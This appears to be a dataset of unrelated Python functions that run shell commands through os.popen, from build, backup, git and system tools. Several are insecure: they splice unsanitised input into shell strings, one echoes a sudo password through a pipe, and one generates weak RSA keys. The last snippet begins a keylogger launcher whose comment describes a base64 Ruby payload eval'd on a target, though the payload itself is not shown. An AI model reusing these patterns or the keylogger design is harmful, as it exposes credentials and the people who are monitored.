def wanKickstart(self): """Sends a minimal kickstart file for wide-area installs.""" # Default distribution name. if self.form.has_key('arch'): self.arch = self.form['arch'].value if self.form.has_key('os'): OS = self.form['os'].value else: OS = 'linux' # should aways come from loader # # get the minimal attributes # attrs = {} for i in [ 'Kickstart_Lang', 'Kickstart_Keyboard', 'Kickstart_PublicHostname', 'Kickstart_PrivateKickstartBasedir' ]: cmd = '/opt/rocks/bin/rocks list attr | ' cmd += "grep '^%s:' | awk '{print $2}'" % i for line in os.popen(cmd).readlines(): var = line[:-1] attrs[i] = var.strip() attrs['hostname'] = self.clientList[0] attrs['arch'] = self.arch attrs['os'] = OS cmd = '/opt/rocks/bin/rocks list node xml wan ' cmd += 'attrs="%s"' % (attrs) for line in os.popen(cmd).readlines(): self.report.append(line[:-1])
def do_simple_submit():
    """Submit sys.argv[1] limit-calculation jobs to an SGE queue, wait for
    them to finish, then merge their outputs with hadd and post-process.

    Relies on module-level `jobnumbers` and the helper `checklist` to track
    outstanding jobs (Python 2 script).
    """
    print "Going to submit "+str(sys.argv[1])+" jobs : "
    fusecommand="hadd -f output/all_limits.root"
    # Escape '/' so the path can be used inside a sed s/// expression.
    path=str(os.path.abspath(os.curdir))
    path=path.replace("/","\/");
    # Instantiate the job script from its template.
    confcommand="cat Source/calcLim.sh_template | sed 's/SETJZBCUT/"+str(sys.argv[1])+"/' | sed 's/SETNJOBS/"+str(sys.argv[1])+"/' | sed 's/THISDIR/"+str(path)+"/' > output/calcLim.sh"
    commands.getoutput(confcommand)
    for ijob in range(0,int(sys.argv[1])):
        # qsub prints "Your job <N> (...)": parse N to track the job.
        pipe=popen("qsub -e /tmp/ -o /tmp/ -N " + "LimCalc"+str(ijob)+ " " + os.curdir + "/output/calcLim.sh"+ " "+str(ijob))
        for l in pipe.readlines():
            if l.find("Your job")>-1:
                thisjobnumber=int(l[l.index('job ')+4:l.index(' (')])
                print ": Submitted job "+str(ijob)+" with job number: "+str(thisjobnumber)
                jobnumbers.append(thisjobnumber)
        fusecommand=fusecommand+" output/DistributedLimits_job"+str(ijob)+"_of_"+str(sys.argv[1])+".root"
    counter=0
    totjobs=sys.argv[1]
    # Poll qstat once a minute (up to 300 times); checklist() removes
    # finished ids from jobnumbers.
    while(len(jobnumbers)>0 and counter<300) :
        counter+=1
        currlist=[]
        pipe=popen("qstat | grep `whoami` | awk '{print $1}'")
        for line in pipe.readlines():
            currlist.append(int(line))
        checklist(jobnumbers,currlist)
        time.sleep(60)
    print "All jobs have finished - need to merge everything and place it in your scratch directory!"
    print commands.getoutput(fusecommand)
    process_command="./produce_limit_plots.exec output/all_limits.root"
    commands.getoutput(process_command)
    print "All done!"
def backup_git_by_page(page, logger):
    """Mirror one page (100 projects) of a GitLab instance to local disk.

    For each project: `git fetch` if a mirror already exists, otherwise
    `git clone --mirror`. Exits the process when a page comes back empty
    (i.e. all pages have been processed).
    """
    git = get_gitlab_instance()
    projects = git.projects.all(page=page, per_page=100)
    git_data_path = GIT_SETTINGS.get('git_data_path')
    if 0 == len(projects):
        # An empty page means pagination is exhausted; stop the whole run.
        logger.info("All projects backup completed !")
        exit(0)
    else:
        logger.info("There are %s projects on page %s." % (len(projects), page))
    try:
        for project in projects:
            git_repo_path = os.path.join(git_data_path, project.path_with_namespace + ".git")
            logger.debug("begin to backup git repo %s !" % project.path_with_namespace)
            # if the project has been cloned,then exec git fetch command,else exec git clone command.
            if os.path.exists(git_repo_path):
                os.chdir(git_repo_path)
                # 2>&1 so git's progress/errors flow through the same pipe.
                for output in os.popen("git fetch 2>&1"):
                    record_log_with_level(logger, output)
            else:
                for output in os.popen("git clone --mirror %s %s 2>&1" % (project.http_url_to_repo, git_repo_path)):
                    record_log_with_level(logger, output)
    except:
        # Log with traceback, then re-raise so the caller still sees it.
        logger.exception('Got exception on logger handler:')
        raise
    logger.info("The projects of page %s backup completed !" % page)
def getProcessNumber(viewerChoice):
    """Return the list of visible X window ids for the given viewer.

    Uses `xdotool search` on DISPLAY=:1 and retries (with 1s sleeps)
    because slow viewers may not have mapped their windows yet.
    """
    regex = "\\b[0-9]+\\b"  # window ids are bare decimal numbers
    process = os.popen("DISPLAY=:1 xdotool search --onlyvisible " + viewerChoice)
    windowIDs = process.read()
    process.close()
    listIDs = []
    counter = 0
    retryCount = 0
    # acroread and firefox takes longer to run
    # acroread is often the slowest
    if viewerChoice == "acroread" or \
        viewerChoice == "firefox":
        retryCount = 4
    else:
        retryCount = 2
    # acroread needs a delay to find windows
    while counter < retryCount:
        listIDs = re.findall(regex, windowIDs)
        print "Getting window numbers: " + str(listIDs)
        if len(listIDs) == 0:
            # Nothing yet: wait a second and re-query xdotool.
            print "cannot find process number, trying again in 1s"
            time.sleep(1)
            process = os.popen("DISPLAY=:1 xdotool search --onlyvisible " + viewerChoice)
            windowIDs = process.read()
            process.close()
        else:
            break
        counter = counter + 1
    return listIDs
def main():
    """SendDataClient entry point: upload service for flashshot.

    Usage: main() with sys.argv[1] = folder whose files should be uploaded.
    """
    log.init_log('./logs/send_data_client')
    # If this region is configured to use an IP proxy, disable the proxy
    # before uploading and re-enable it afterwards.  'uping' is set to 1 so
    # the checkIpProxy job (runs every five minutes) leaves the proxy alone
    # during the upload; it is reset to 0 when we are done.
    if config.NEED_PROXY:
        configFile = ConfigParser.ConfigParser()
        configFile.read(CONFIGFILE)
        configFile.set("info", "uping", 1)
        configFile.write(open(CONFIGFILE, "w"))
        logging.info('setProxy("0") ')
        # Turn the local proxy off before transferring the images.
        ipProxy.setProxy("0")
    target_folder = sys.argv[1]
    target_filenames = get_file_list(target_folder)
    upload_files(target_folder, target_filenames)
    # After the transfer, restore the local proxy setting.
    if config.NEED_PROXY:
        configFile = ConfigParser.ConfigParser()
        configFile.read(CONFIGFILE)
        ip1 = configFile.get("info", "ip1")
        configFile.set("info", "uping", 0)
        configFile.write(open(CONFIGFILE, "w"))
        # Re-enable via a child process rather than in-process.
        enableProxyScript = "python ipProxy.py " + ip1
        os.popen(enableProxyScript)
        # ipProxy.setProxy(ip1)
        logging.info('setProxy ' + ip1)
def update(self, objfile):
    """Record the imported/exported symbols of one object file.

    Runs the platform's `nm` variant, parses (type, symbol) pairs, and
    fills self.objects[objfile]["imports"/"exports"].  'U' entries are
    undefined (imported) symbols; 'C'/'D'/'T' are defined (exported).
    NOTE(review): on an unrecognized sysname, `symbols`/`fp` would be
    unbound — presumably only Linux/SunOS/IRIX are supported; confirm.
    """
    self.filename = objfile
    (sysname, nodename, release, version, machine) = os.uname()
    if sysname == "Linux":
        # POSIX output format; split by helper.
        fp = os.popen("nm -P " + objfile, "r")
        symbols = map(self.split_, fp.readlines())
    elif sysname == "SunOS":
        # Skip the 12-char address column before splitting.
        fp = os.popen("nm -p " + objfile, "r")
        symbols = map(lambda l: string.split(l[12:]), fp.readlines())
        pass
    elif sysname == "IRIX":
        # BSD format; skip the 8-char address column.
        fp = os.popen("nm -B " + objfile, "r")
        symbols = map(lambda l: string.split(l[8:]), fp.readlines())
        pass
    object = objfile
    for (type, symbol) in symbols:
        # Lazily create the per-object record on first symbol.
        if not self.objects.has_key(object):
            self.objects.update({ object : dict({ "exports" : dict(), "imports" : dict() }) })
            pass
        if type == "U":
            self.objects[object]["imports"].update({ symbol : dict() })
        elif type in ["C", "D", "T"]:
            self.objects[object]["exports"].update({ symbol : dict() })
            pass
        pass
    fp.close()
    return (None)
def m2c_key(arg1, arg2):
    """Generate a 1024-bit RSA key pair with M2Crypto and sanity-check it.

    arg1/arg2 are the output paths for the public and private PEM files.
    A test message is encrypted/decrypted round-trip; on any failure the
    generated *.pem files are removed and an Exception is raised.
    """
    try:
        # exponent 3; the lambda silences M2Crypto's progress callback.
        rsa = RSA.gen_key(1024, 3, lambda *agr:None)
        pub_bio = BIO.MemoryBuffer()
        priv_bio = BIO.MemoryBuffer()
        rsa.save_pub_key_bio(pub_bio)
        rsa.save_key_bio(priv_bio, None)  # None cipher: unencrypted key
        pub_file = arg1
        # pub_file = arg1 + 'pub.pem'
        private_file = arg2
        # private_file = arg2 + 'private.pem'
        open(pub_file,'w').write(pub_bio.read_all())
        open(private_file,'w').write(priv_bio.read_all())
        # Reload from disk to verify the files are usable.
        pub_key = RSA.load_pub_key(pub_file)
        priv_key = RSA.load_key(private_file)
        message = 'opzoon'
        encrypted = pub_key.public_encrypt(message, RSA.pkcs1_padding)
        decrypted = priv_key.private_decrypt(encrypted, RSA.pkcs1_padding)
        if decrypted==message:
            #os.popen("rm -rf m2crypto_gen_key.py")
            pass
        else:
            # Round-trip failed: scrap the keys and bail out.
            os.popen("rm -rf *.pem")
            print "Key generation failed,please try again!"
            raise Exception("Key generation failed,please try again!")
    except Exception,e:
        os.popen("rm -rf *.pem")
        raise Exception("Key generation failed,please try again!")
def checkDbus(self):
    """Ensure a D-Bus session bus is available, relaunching it if needed.

    Checks that DBUS_SESSION_BUS_PID points at a live process; if not,
    runs dbus-launch and imports the KEY=value pairs it prints into
    os.environ.  Always returns True.
    """
    need_relaunch = False
    pid = os.getenv('DBUS_SESSION_BUS_PID', None)
    if pid:
        # grep -c prints how many matching processes exist; '0' = dead.
        cmd = 'ps -p %s | grep -c %s ' % (pid, pid)
        res = os.popen(cmd).read().strip()
        if res != '0':
            pass
        else:
            need_relaunch = True
    else:
        need_relaunch = True
    if need_relaunch:
        print '==> Need to relaunch dbus-launch'
        os.system('env | grep DBUS_')
        cmd = 'dbus-launch '
        res = os.popen(cmd).read().strip()
        lines = res.splitlines()
        for line in lines:
            # dbus-launch emits lines of the form NAME=value.
            m = r'(\w*)=(.*)'
            rr = re.findall(m, line)
            if len(rr):
                k, v = rr[0]
                print '--> putenv :', k, v
                os.environ[k] = v
    return True
def install_osx():
    """Set up Home Assistant to run via launchd on OS X.

    Fills in the launchd.plist template with the `hass` binary path and
    the current user, writes it to ~/Library/LaunchAgents, then loads it
    with launchctl.  Prints an error and returns early if the plist
    cannot be written.
    """
    with os.popen('which hass') as inp:
        hass_path = inp.read().strip()
    with os.popen('whoami') as inp:
        user = inp.read().strip()
    template_path = os.path.join(os.path.dirname(__file__), 'launchd.plist')
    with open(template_path, 'r', encoding='utf-8') as inp:
        plist = inp.read()
    plist = plist.replace("$HASS_PATH$", hass_path)
    plist = plist.replace("$USER$", user)
    path = os.path.expanduser("~/Library/LaunchAgents/org.homeassistant.plist")
    try:
        with open(path, 'w', encoding='utf-8') as outp:
            outp.write(plist)
    except IOError as err:
        print('Unable to write to ' + path, err)
        return
    # Fix: read (and close) the pipe so launchctl actually finishes before
    # we report success — the bare os.popen() never waited for the command.
    with os.popen('launchctl load -w -F ' + path) as proc:
        proc.read()
    print("Home Assistant has been installed. \
Open it here: http://localhost:8123")
def aws_command(cmd):
    """Run an AWS CLI command, caching its JSON output under /tmp/aws-cache.

    The cache key is the full command line with spaces replaced by '_'.
    On a cache hit the stored JSON is returned without invoking aws.
    Relies on module-level `profile`, `aws_flags`, and `echo`.
    """
    # Replaces `os.popen("mkdir -p ...")`: same effect, no shell.
    os.makedirs("/tmp/aws-cache", exist_ok=True)
    # Fix: work on a copy — the original extended the module-level
    # `aws_flags` list, so every call appended another "--profile X" pair.
    flag_list = list(aws_flags)
    if profile:
        flag_list.extend(["--profile", profile])
    flags = " ".join(flag_list)
    aws_cmd = "aws %s %s" % (flags, cmd)
    echo("%s" % aws_cmd)
    safe_cmd = "/tmp/aws-cache/%s" % aws_cmd.replace(" ", "_")
    if os.path.exists(safe_cmd):
        echo(" HIT\n")
        with open(safe_cmd, "r") as jsonfile:
            raw_json = json.load(jsonfile)
        return raw_json
    echo(" MISS\n")
    raw = os.popen(aws_cmd).read()
    raw_json = json.loads(raw)
    with open(safe_cmd, "w") as outfile:
        json.dump(raw_json, outfile)
    return raw_json
def save(self, path=None, common=None, sudo_password=None):
    """Write this hosts configuration (plus `common`) to `path`.

    If sudo_password is given, the target file (typically the system
    hosts file) is chmod'ed writable first and restored afterwards.
    Returns True on completion.
    """
    from stat import ST_MODE
    fn_stat = 744  # fallback mode if the original cannot be read
    if self.last_save_time:
        # Debounce: ignore saves arriving within 1 ms of the previous one.
        time_delta = time.time() - self.last_save_time
        if time_delta < 0.001:
            pass
    path = path or self.path
    path = path.encode(co.getLocalEncoding())
    if sudo_password:
        # First loosen the permissions on the system hosts file.
        fn_stat = oct(os.stat(path)[ST_MODE])[-3:]
        cmd = "echo '%s' | sudo -S chmod %s %s" % (sudo_password, 766, path)
        os.popen(cmd)
    # Write the hosts content.
    open(path, "w").write(self.contentWithCommon(common))
    if sudo_password:
        # Then restore the original permissions.
        cmd = "echo '%s' | sudo -S chmod %s %s" % (sudo_password, fn_stat, path)
        os.popen(cmd)
    self.last_save_time = time.time()
    return True
def param(name, symlink):
    """Create and persist the parameter set for a new Claroline platform.

    Generates random passwords/token with `apg`, writes the data as YAML
    to <platform_dir>/<name>.yml, and returns the dict.  `symlink`, if
    given, must name an already-installed base platform.
    """
    if symlink and not get_installed_platform(symlink):
        raise Exception("The base platform " + symlink + " doesn" "t exists.")
    # apg: -m/-x min/max length, -n count, -M charset classes.
    db_pwd_gen = os.popen("apg -a 1 -m 25 -n 1 -MCLN").read().rstrip()
    token_gen = os.popen("apg -a 1 -m 50 -n 1 -MCLN").read().rstrip()
    ecole_admin_pwd_gen = os.popen("apg -a 0 -m 12 -x 12 -n 1 -MCLN").read().rstrip()
    data = dict(
        name=name,
        user_home="/home/" + name + "/",
        claroline_root="/home/" + name + "/claroline/",
        db_name=name,
        db_pwd=db_pwd_gen,
        token=token_gen,
        ecole_admin_pwd=ecole_admin_pwd_gen,
        base_platform=symlink,
    )
    data_yaml = yaml.dump(data, explicit_start=True, default_flow_style=False)
    paramFile = open(platform_dir + "/" + name + ".yml", "w+")
    paramFile.write(data_yaml)
    if not args.symlink:
        print "No symlink for " + name + "."
    else:
        print "Symlinked to " + symlink + "."
    return data
def createPreviewMayaFile(self):
    """Launch mayapy (matching the running Maya version) to generate a
    preview scene for this asset's .ma file via createPreview.py."""
    # The helper script lives next to this module.
    createPrevScript = os.path.dirname(os.path.abspath(__file__)) + '/createPreview.py'
    # Windows-style Maya install path; mc.about(v=True) gives the version.
    cmd = 'C:/"Program Files"/Autodesk/Maya' + mc.about(v = True) + '/bin/' + 'mayapy.exe ' + createPrevScript + ' ' + self.path + self.name + '.ma'
    print cmd
    #create preview scene
    os.popen( cmd )
def schedule_exec_file(script, test_name, result_query, test_detail, exec_time, log_file): start = time.asctime() if exec_time in time.asctime(): chmod = os.popen("chmod +x ./{0}".format(script)).read() if ":sh" in chmod: print "Failed to chmod\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "Fail") if ":sh" not in chmod: print "Pass chmod {0}".format(test_name) stop = time.asctime() test_logger(log_file, test_name, start, stop, "Pass") cmd = os.popen("./{0}".format(script)).read() if result_query not in cmd: print "Failed {0}\n".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "fail") if result_query in cmd: print "Pass {0}".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" else: print "{0} ".format(test_name) + "Will run next @ {0}".format(exec_time) stop = time.asctime() test_logger(log_file, test_name, start, stop, "Command Deferred")
def exec_file(script, test_name, result_query, test_detail, log_file):
    """Immediately run `script` and log Pass/Fail based on its output.

    chmod +x the script first (a ":sh" substring in chmod's output marks
    a shell error), run it, and search its stdout for result_query.
    All outcomes are recorded through test_logger.
    """
    start = time.asctime()
    chmod = os.popen("chmod +x ./{0}".format(script)).read()
    if ":sh" in chmod:
        print "Failed to chmod\n"
        stop = time.asctime()
        test_result = "Fail"
        test_logger(log_file, "Chmod", start, stop, test_result)
    if ":sh" not in chmod:
        print "Pass chmod {0}".format(test_name)
        stop = time.asctime()
        test_result = "Pass"
        test_logger(log_file, "Chmod", start, stop, test_result)
        # Run the test script and inspect its output.
        cmd = os.popen("./{0}".format(script)).read()
        if result_query not in cmd:
            print "Failed {0}\n".format(test_name)
            print "Test detail: \n" + test_detail + "\n"
            print "Result: \n" + cmd + "\n"
            stop = time.asctime()
            test_logger(log_file, test_name, start, stop, "Fail")
        if result_query in cmd:
            print "Pass {0}".format(test_name)
            print "Test detail: \n" + test_detail + "\n"
            print "Result: \n" + cmd + "\n"
            stop = time.asctime()
            test_logger(log_file, test_name, start, stop, "Pass")
def KillAllProcesses(ppid=None):
    """Kill process `ppid` and its entire descendant tree.

    On Windows this delegates to TASKKILL /T.  On POSIX the child pids
    are collected via `ps -ef` (transitively) and each is sent SIGKILL,
    falling back to `kill -9` through a shell.  Returns True if every
    kill attempt succeeded, False otherwise.
    """
    if IsWindows():
        subprocess.check_call("TASKKILL /F /PID %s /T" % ppid)
    else:
        ppid = str(ppid)
        pidgrp = []

        def GetChildPids(ppid):
            # $3 is the parent pid column of `ps -ef`.
            command = "ps -ef | awk '{if ($3 ==%s) print $2;}'" % str(ppid)
            pids = os.popen(command).read()
            return pids.split()

        pidgrp.extend(GetChildPids(ppid))
        # Extending while iterating walks the tree breadth-first.
        for pid in pidgrp:
            pidgrp.extend(GetChildPids(pid))
        pidgrp.insert(0, ppid)
        # Fix: the original returned True from inside the loop after the
        # first successful kill, leaving every other process alive.
        all_killed = True
        while len(pidgrp) > 0:
            pid = pidgrp.pop()
            try:
                os.kill(int(pid), signal.SIGKILL)
            except OSError:
                try:
                    os.popen("kill -9 %d" % int(pid))
                except Exception:
                    all_killed = False
        return all_killed
def run_modpython():
    """Benchmark under mod_python: write a config, start Apache, run the
    benchmark, and always stop Apache afterwards.

    The --null and --ab command-line options are forwarded into the
    generated Apache config as PythonOption directives.
    """
    # Pass the null and ab=path options through Apache
    nullreq_opt = ""
    if "--null" in opts:
        nullreq_opt = " PythonOption nullreq\n"
    ab_opt = ""
    if "--ab" in opts:
        ab_opt = " PythonOption ab %s\n" % opts["--ab"]
    conf_data = mp_conf_template % (ab_opt, nullreq_opt)
    mpconf = os.path.join(curdir, "bench_mp.conf")
    f = open(mpconf, 'wb')
    try:
        f.write(conf_data)
    finally:
        f.close()
    apargs = "-k start -f %s" % mpconf
    try:
        read_process(APACHE_PATH or "apache", apargs)
        run()
    finally:
        # Fix: honour APACHE_PATH on shutdown too (startup already does);
        # previously a non-default apache binary was never stopped.
        os.popen("%s -k stop" % (APACHE_PATH or "apache"))
def load_options():
    """Read git-pull-request.* settings from `git config -l` into `options`.

    Keys prefixed with the repository's top-level path are treated as
    per-repo overrides: the prefix is stripped and they win over the
    global values.  String values f/t/none (etc.) are coerced to
    False/True/None.
    """
    all_config = os.popen('git config -l').read().strip()
    git_base_path = os.popen('git rev-parse --show-toplevel').read().strip()
    path_prefix = "%s." % git_base_path
    overrides = {}
    matches = re.findall("^git-pull-request\.([^=]+)=([^\n]*)$", all_config, re.MULTILINE)
    for key, value in matches:
        normalized = value.lower()
        # Coerce the usual boolean / null spellings.
        if normalized in ('f', 'false', 'no'):
            value = False
        elif normalized in ('t', 'true', 'yes'):
            value = True
        elif normalized in ('', 'none', 'null', 'nil'):
            value = None
        if path_prefix in key:
            # Repo-scoped setting: strip the path prefix, apply last.
            overrides[key.replace(path_prefix, '')] = value
        else:
            options[key] = value
    options.update(overrides)
def test_popen(self):
    """Verify that a command run via os.popen inherits the current
    working directory: run it, then again after chdir, checking the
    cwd recorded in filename1 each time."""
    os.popen(self._command()).read()
    self.assertEqual(read(self.filename1), os.getcwd())
    os.chdir(self.dir2)
    os.popen(self._command()).read()
    self.assertEqual(read(self.filename1), os.getcwd())
def _get_opened_files(targets, blade_root_dir, working_dir):
    """Return the set of locally modified/added C/C++ files (abs paths)
    covering the directories of `targets`, using svn or git status.

    Each target directory is queried at most once; unknown VCS types are
    warned about and contribute no files.
    """
    check_dir = set()
    opened_files = set()
    blade_root_dir = os.path.normpath(blade_root_dir)
    for target in targets:
        target = _normalize_target_path(target)
        d = os.path.dirname(target)
        if d in check_dir:
            # Fix: was `return`, which aborted the whole scan (returning
            # None) as soon as two targets shared a directory.
            continue
        check_dir.add(d)
        output = []
        if is_svn_client(blade_root_dir):
            full_target = os.path.normpath(os.path.join(working_dir, d))
            # Path of the target dir relative to the workspace root.
            top_dir = full_target[len(blade_root_dir) + 1:]
            output = os.popen('svn st %s' % top_dir).read().split('\n')
        else:
            (is_git, git_root, git_subdir) = is_git_client(blade_root_dir, target, working_dir)
            if is_git:
                os.chdir(git_root)
                status_cmd = 'git status --porcelain %s' % (git_subdir)
                output = os.popen(status_cmd).read().split('\n')
            else:
                console.warning('unknown source client type, NOT svn OR git')
        for f in output:
            seg = f.strip().split(' ')
            # Keep only Modified / Added entries.
            if seg[0] != 'M' and seg[0] != 'A':
                continue
            f = seg[len(seg) - 1]
            if f.endswith('.h') or f.endswith('.hpp') or f.endswith('.cc') or f.endswith('.cpp'):
                fullpath = os.path.join(os.getcwd(), f)
                opened_files.add(fullpath)
    return opened_files
def get_work_dir():
    """Resolve (and cache in module-level _work_dir) the working directory.

    Looks first for a branch-specific `git-pull-request.work-dir-<branch>`
    config value, then falls back to the global 'work-dir' option.
    Returns the path, or False if none exists.
    """
    global _work_dir
    if (_work_dir == None):
        # Current branch name, e.g. 'refs/heads/main' -> 'main'.
        symbolic_ref = os.popen('git symbolic-ref HEAD').read().strip().replace('refs/heads/', '')
        work_dir_global = options['work-dir']
        work_dir_option = None
        if symbolic_ref:
            work_dir_option = 'work-dir-%s' % symbolic_ref
        if work_dir_option:
            _work_dir = os.popen('git config git-pull-request.%s' % work_dir_option).read().strip()
            options[work_dir_option] = _work_dir
            # Branch-specific value must exist on disk to count.
            if not _work_dir or not os.path.exists(_work_dir):
                _work_dir = False
        if not _work_dir:
            # Fall back to the global setting, if valid.
            if work_dir_global and os.path.exists(work_dir_global):
                _work_dir = work_dir_global
            else:
                _work_dir = False
    return _work_dir
def analize(task):
    """Check one built HTML file (task 'name:filename') for broken
    internal links, printing each broken target; with --find-sources,
    also print which inputs produce the file (via nikola)."""
    try:
        filename = task.split(":")[-1]
        d = lxml.html.fromstring(open(filename).read())
        for l in d.iterlinks():
            # l is (element, attribute, link, pos); resolve the raw href.
            target = l[0].attrib[l[1]]
            if target == "#":
                continue
            parsed = urlparse(target)
            # External links (with a scheme) are not checked.
            if parsed.scheme:
                continue
            if parsed.fragment:
                target = target.split('#')[0]
            target_filename = os.path.abspath(
                os.path.join(os.path.dirname(filename), urllib.unquote(target)))
            if target_filename not in existing_targets:
                if os.path.exists(target_filename):
                    # Cache hits so repeated targets are only stat'ed once.
                    existing_targets.add(target_filename)
                else:
                    print "In %s broken link: " % filename, target
                    if '--find-sources' in sys.argv:
                        print "Possible sources:"
                        print os.popen(
                            'nikola build list --deps %s' % task, 'r').read()
                        print "===============================\n"
    except Exception as exc:
        print "Error with:", filename, exc
def __init__(self, persist=None):
    """Start a gnuplot process.

    Create a 'GnuplotProcess' object.  This starts a gnuplot program
    and prepares to write commands to it.

    Keyword arguments:

      'persist=1' -- start gnuplot with the '-persist' option, (which
          leaves the plot window on the screen even after the gnuplot
          program ends, and creates a new plot window each time the
          terminal type is set to 'x11').  This option is not available
          on older versions of gnuplot.

    """
    if persist is None:
        persist = GnuplotOpts.prefer_persist
    if persist:
        if not test_persist():
            # Fix: the original raised a bare string, which is a
            # TypeError in any modern Python; raise a real exception.
            raise Exception('-persist does not seem to be supported '
                            'by your version of gnuplot!')
        self.gnuplot = popen('%s -persist' % GnuplotOpts.gnuplot_command, 'w')
    else:
        self.gnuplot = popen(GnuplotOpts.gnuplot_command, 'w')
    # forward write and flush methods:
    self.write = self.gnuplot.write
    self.flush = self.gnuplot.flush
def execute_command(cmd):
    """Run `cmd` through a shell via os.popen.

    On failure, optionally print the underlying error (when the
    module-level DEBUG flag is set) and raise a generic Exception naming
    the command.  Returns None.
    """
    try:
        os.popen(cmd)
    # Fix: `except Exception, e` is Python-2-only syntax; the `as` form
    # works on Python 2.6+ and 3.x alike.
    except Exception as e:
        if DEBUG:
            print(e)
        raise Exception("Error when try execute_command ", cmd)
def _init_aix(self): uname = os.uname() self.os = "aix" self.os_ver = "%s.%s" % (uname[3], uname[2]) # Determine processor type from 'uname -p' -- os.uname() does not # have this. o = os.popen('uname -p 2> /dev/null') arch = o.read().strip() o.close() # 32-bit or 64-bit? # Ideas from http://www.stata.com/support/faqs/win/64bit.html o = os.popen('getconf -v KERNEL_BITMODE 2> /dev/null') kbitmode = o.read().strip() o.close() if kbitmode: sixtyfour = '64' in kbitmode else: o = os.popen('file /usr/lib/boot/unix* 2> /dev/null') listing = o.read().strip() o.close() sixtyfour = '64-bit XCOFF executable' in listing self.arch = arch + (sixtyfour and '64' or '')
def invoke_rndc_stats(stats_file_path, remfile):
    """Ask BIND to dump statistics (`rndc stats`), read the dump file,
    optionally delete it, and return its raw contents.

    NOTE(review): if the stats file does not exist, `raw_data` is never
    bound (the final return raises NameError) and the else-branch prints
    an undefined `e` — presumably these paths were never exercised;
    confirm before relying on them.
    """
    cmd='rndc stats'
    try:
        os.popen(cmd)
    except OSError as e:
        error_message = "%s execution failed" % cmd
        print >>sys.stderr, error_message, e
    if os.path.isfile(stats_file_path):
        try:
            raw_data = openfile(stats_file_path)
        except OSError as e:
            error_message = "%s file open failed" % stats_file_path
            print >>sys.stderr, error_message, e
    else:
        error_message = "%s does not exist in system, or insufficient permissions" % stats_file_path
        print >>sys.stderr, error_message, e
    # let file remove be optional
    if remfile == True:
        try:
            os.remove(stats_file_path)
        except OSError as e:
            error_message = "%s file remove failed, or insufficient permissions" % stats_file_path
            print >>sys.stderr, error_message, e
    return raw_data
def getMAC(staticMAC = [None]):
    """Return this machine's MAC address, caching the result.

    The mutable default argument is used deliberately as a per-process
    cache: once resolved, subsequent calls return staticMAC[0] directly.
    Returns 'NO_MAC' if ipconfig fails, '-1' when the darwin lookup finds
    nothing, '-2' on unsupported platforms.
    """
    if staticMAC[0] == None:
        if sys.platform == 'win32':
            correctSection = 0
            try:
                ipconfdata = os.popen('/WINDOWS/SYSTEM32/ipconfig /all').readlines()
            except:
                staticMAC[0] = 'NO_MAC'
                return staticMAC[0]
            for line in ipconfdata:
                # Only accept the Physical Address that follows the
                # 'Local Area Connection' section header.
                if line.find('Local Area Connection') >= 0:
                    correctSection = 1
                if line.find('Physical Address') >= 0 and correctSection == 1:
                    pa = line.split(':')[-1].strip()
                    correctSection = 0
                    staticMAC[0] = pa
                    return pa
        if sys.platform == 'darwin':
            macconfdata = os.popen('/usr/sbin/system_profiler SPNetworkDataType |/usr/bin/grep MAC').readlines()
            result = '-1'
            if macconfdata:
                if macconfdata[0].find('MAC Address') != -1:
                    # Slice the 20 chars after ': ' (xx:xx:...), then use
                    # dashes to match the Windows format.
                    pa = macconfdata[0][macconfdata[0].find(':') + 2:macconfdata[0].find(':') + 22].strip('\n')
                    staticMAC[0] = pa.replace(':', '-')
                    result = staticMAC[0]
            return result
        if sys.platform != 'darwin' and sys.platform != 'win32':
            print 'System is not running OSX or MS-Windows.'
            return '-2'
    else:
        return staticMAC[0]
    return
def bodyTest():
    """Verify that neither provider JSON file leaks credentials.

    Greps the rhevm and vsphere JSON files for password/username; on a
    match the offending file is dumped and False is returned, otherwise
    both files are printed and True is returned.
    """
    #check if aeolus-cleanup removes directory. /var/tmp and /var/lib/iwhd/images
    print "=============================================="
    print "test being started"
    print "Checking if there is password/username in json's files..."
    # os.system returns the shell status; SUCCESS here means grep matched.
    if os.system("grep -i \"password\|username\" " + rhvemJSONFile) == SUCCESS:
        print "Ergh, there is password and/or username in rhevm json file :("
        print "See the output from json file " + rhvemJSONFile + ":"
        print "======================================================"
        outputtmp = os.popen("cat " + rhvemJSONFile).read()
        print outputtmp
        return False
    else:
        if os.system("grep -i \"password\|username\" " + vsphereJSONFile) == SUCCESS:
            print "Ergh, there is password and/or username in vsphere json file :("
            print "See the output from json file " + vsphereJSONFile + ":"
            print "======================================================"
            outputtmp = os.popen("cat " + vsphereJSONFile).read()
            print outputtmp
            return False
        # Both files clean: show their contents for the test log.
        outputtmp = os.popen("cat " + vsphereJSONFile).read()
        print "Vsphere json file " + vsphereJSONFile + ":"
        print outputtmp
        outputtmp = os.popen("cat " + rhvemJSONFile).read()
        print "rhvem json file " + rhvemJSONFile + ":"
        print outputtmp
        return True
def build_xpi(self, is_update=False):
    """Zip the extension directory into an XPI and return (url, sha1 hash).

    The file name embeds the recipient slug (or 'Update'/'Generic') and
    the version.  When is_update is True, updates.rdf is refreshed with
    the new url/hash as well.
    """
    if is_update:
        name = "Update"
    elif self.recipient:
        name = self.recipient.slug
    else:
        name = "Generic"
    print "THE NAME", name, self.recipient
    xpi_nm = 'ProcrasDonate_%s_%s.xpi' % (name, self.get_version())
    xpi_fn = pathify([self.xpi_dir, xpi_nm], file_extension=True)
    # zip is run from inside the extension dir so paths are archive-relative.
    os.chdir(self.extn_dir)
    print
    print "XPI_FN", xpi_fn
    print "EXTN_DIR", self.extn_dir
    print
    os.popen('zip -r "%s" *' % xpi_fn)
    print
    xpi_url = "%s%s/%s" % (MEDIA_URL, 'xpi', xpi_nm)
    # Hash of the finished archive, in the 'sha1:<hex>' form update
    # manifests expect.
    xpi_file = open(xpi_fn, 'rb')
    xpi_hash = "sha1:%s" % hashlib.sha1(xpi_file.read()).hexdigest()
    xpi_file.close()
    if is_update:
        self.update_updates_rdf(xpi_url, xpi_hash)
    return (xpi_url, xpi_hash)
def keylogger_start():
    """Start the Ruby keylogger in the background, logging to a random
    /tmp file; record its pid and log path in module globals.

    Returns 'running' if a previous instance's log file still exists,
    True otherwise.
    """
    global pid
    global logFile
    if logFile:
        if os.path.exists(logFile):
            return 'running'
    # The Ruby payload is shipped base64-encoded and eval'd on the target.
